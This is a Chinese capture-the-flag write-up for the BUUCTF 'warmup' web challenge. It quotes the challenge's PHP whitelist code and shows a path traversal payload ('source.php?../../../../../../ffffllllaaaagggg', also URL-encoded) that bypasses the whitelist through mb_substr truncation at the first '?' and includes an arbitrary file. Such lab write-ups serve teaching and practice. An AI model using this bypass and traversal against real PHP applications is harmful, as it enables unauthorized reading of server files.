BUUCTFWEB

warmup

 题目描述

一打开就看到,那咱们就进去看看里面有什么

"source.php","hint"&＃61;>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can&＃39;t see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page &＃61; mb_substr($page,0,mb_strpos($page . &＃39;?&＃39;, &＃39;?&＃39;));if (in_array($_page, $whitelist)) {return true;}$_page &＃61; urldecode($page);$_page &＃61; mb_substr($_page,0,mb_strpos($_page . &＃39;?&＃39;, &＃39;?&＃39;));if (in_array($_page, $whitelist)) {return true;}echo "you can&＃39;t see it";return false;}}if (! empty($_REQUEST[&＃39;file&＃39;])&& is_string($_REQUEST[&＃39;file&＃39;])&& emmm::checkFile($_REQUEST[&＃39;file&＃39;])) {include $_REQUEST[&＃39;file&＃39;];exit;} else {echo "
";}
?>

然后我们看到了hint.php&＃xff0c;那就再进去看看了 

$_page &＃61; mb_substr($page,0,mb_strpos($page . &＃39;?&＃39;, &＃39;?&＃39;)//mb_strpos — 查找字符串在另一个字符串中首次出现的位置);if (in_array($_page, $whitelist)) {return true;}


 这就猜测flag&＃xff0c;在ffffllllaaaagggg里面

根据上面的代码

现在假设我的payload为&＃xff1a;file&＃61;source.php?/../ffffllllaaaagggg&＃xff0c;经过mb_strpos为source.php?/../ffffllllaaaagggg?,但是mb_strpos这个函数只返回首次出现的位置&＃xff0c;所以还是会返回第一个&＃xff1f;的位置&＃xff0c;而mb_substr截取函数&＃xff0c;从0开始截取一直到第一个&＃xff1f;的位置&＃xff0c;截取内容为source.php&＃xff0c;恰好能与白名单中的进行匹配&＃xff0c;可以return true;&＃xff0c;所以通过第一次截取进行绕过。

接下来&＃xff0c;只要利用../回到服务器的根目录下&＃xff0c;找到flag就行&＃xff0c;经过测试&＃xff0c;需要6个../&＃xff0c;但是多打几个其实也可以&＃xff0c;然后就是   ?source.php%25%33%46../../../../ffffllllaaaagggg &＃xff0c;得到flag:

http://1beba5b6-c6b0-4484-9a0e-36a1e6e78cba.node3.buuoj.cn/?file&＃61;source.php%3F../../../../../../ffffllllaaaagggg

资料来源&＃xff1a; 

https://blog.csdn.net/qq_43431158/article/details/102551843

https://www.cnblogs.com/leixiao-/p/10265150.html

https://www.jianshu.com/p/42011eb79f8b